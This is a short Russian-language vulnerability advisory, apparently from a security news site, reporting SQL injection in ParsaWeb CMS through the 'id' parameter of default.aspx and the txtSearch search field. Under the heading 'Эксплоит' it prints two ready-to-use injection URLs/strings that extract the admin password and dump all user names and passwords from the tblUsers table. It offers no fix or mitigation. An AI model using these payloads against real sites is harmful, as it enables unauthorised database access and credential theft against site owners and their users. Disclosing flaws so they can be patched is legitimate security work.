Программа: ParsaWeb CMS

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием default.aspx и txtSearch в
секции search. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from
tblUsers where user_name = 'admin')

http://www.example.com/?page=Search

Search: AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11
from tblUsers--

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии